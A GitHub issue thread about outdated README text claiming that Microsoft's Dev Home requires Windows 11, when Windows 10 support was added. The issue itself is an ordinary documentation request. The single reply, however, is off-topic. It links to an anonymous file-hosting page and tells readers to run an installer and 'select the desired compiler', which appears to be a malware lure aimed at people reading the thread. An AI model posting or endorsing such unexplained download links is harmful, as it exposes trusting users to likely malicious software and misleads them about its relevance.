### ISSUE TITLE
README.md says Dev Home requires Windows 11

### ISSUE THREAD

**Issue by Doug-Funnie263** [microsoft/devhome#3756]
### Provide a description of requested docs changes

I installed Dev Home on my Windows 10 22H2 and it works perfectly.
It seems that the documentation is months out of date, as PR #2096 fixed Issue #683, officially adding support for Windows 10.
However, it probably won't work on all versions of Windows 10, so it should be updated mentioning the minimum supported version.
https://github.com/microsoft/devhome/blob/15491cef7714d99aec3c43b36bf667502e5708f7/README.md?plain=1#L19
https://github.com/microsoft/devhome/blob/15491cef7714d99aec3c43b36bf667502e5708f7/README.md?plain=1#L94

**Comment by santos-naudiyal** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
